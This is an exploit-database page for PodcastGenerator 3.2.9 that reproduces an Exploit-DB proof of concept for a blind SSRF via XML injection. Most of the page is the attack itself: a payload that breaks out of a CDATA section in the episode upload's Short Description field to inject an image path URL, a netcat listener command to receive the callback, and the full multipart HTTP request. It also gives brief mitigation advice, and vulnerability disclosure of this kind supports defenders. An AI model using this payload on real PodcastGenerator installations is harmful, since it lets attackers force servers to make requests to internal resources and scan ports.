header-logo
Suggest Exploit
vendor:
PodcastGenerator
by:
Mirabbas Agalarov
7.5
CVSS
HIGH
Blind SSRF via XML Injection
CWE
Product Name: PodcastGenerator
Affected Version From: v3.2.9
Affected Version To: v3.2.9
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Linux
2023

PodcastGenerator 3.2.9 – Blind SSRF via XML Injection

The PodcastGenerator application version 3.2.9 is vulnerable to blind SSRF via XML Injection. An attacker can inject malicious XML code in the Short Description section, leading to server-side request forgery (SSRF) attacks. By exploiting this vulnerability, an attacker can make arbitrary requests to internal resources or perform port scanning.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and validate XML data before processing it. Additionally, access controls should be implemented to prevent unauthorized access to internal resources.
Source

Exploit-DB raw data:

#Exploit Title: PodcastGenerator 3.2.9 - Blind SSRF via XML Injection
#Application: PodcastGenerator
#Version: v3.2.9
#Bugs:  Blind SSRF via XML Injection
#Technology: PHP
#Vendor URL: https://podcastgenerator.net/
#Software Link: https://github.com/PodcastGenerator/PodcastGenerator
#Date of found: 01-07-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux 

2. Technical Details & POC
========================================
steps: 
1. Go to 'Upload New Episodes' (http://localhost/PodcastGenerator/admin/episodes_upload.php)
2. Fill all section and Short Description section set as 'test]]></shortdescPG><imgPG path="">( example :Attacker domain)http://localhost:3132</imgPG><shortdescPG><![CDATA[test'

payload:  test]]></shortdescPG><imgPG path="">http://localhost:3132</imgPG><shortdescPG><![CDATA[test

By the way i used localhost.If you have domain, you can use domain.

3.And upload episodes

4. I am listening on port 3132 because I'm observating for incoming requests

nc -lvp 3132

5. And I receive request

request:

POST /PodcastGenerator/admin/episodes_upload.php HTTP/1.1
Host: localhost
Content-Length: 101563
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypRUTcUa48pmEcI6Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/PodcastGenerator/admin/episodes_upload.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=rsvvc28on2q91ael2fiou3nad3
Connection: close

------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="file"; filename="2023-07-01_2023-07-01_2023-07-01_4_photo-1575936123452-b67c3203c357_1_ (2).jpeg"
Content-Type: image/jpeg

image content blaaahblahasdfjblaaah;sdfblaaahasdf
asdfasdfadddblaaahdblaaahddddblaaahddddddblaaahblaaahblaaahdddblaaahddddblaaahdblaaahddblaaahdddddblaaahddddddddddd

------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="title"

test
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="shortdesc"

test]]></shortdescPG><imgPG path="">http://localhost:3132</imgPG><shortdescPG><![CDATA[test
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="date"

2023-07-01
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="time"

17:02
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="episodecover"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="longdesc"

test
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="episodenum"

33
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="seasonnum"

33
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="itunesKeywords"


------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="explicit"

no
------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="authorname"


------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="authoremail"


------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="customtags"


------WebKitFormBoundarypRUTcUa48pmEcI6Q
Content-Disposition: form-data; name="token"

vdzM0jc75uLMHV7ovxew8Dawh5mnWSpz
------WebKitFormBoundarypRUTcUa48pmEcI6Q--

Navigation

Suggest Exploit

Services By CQR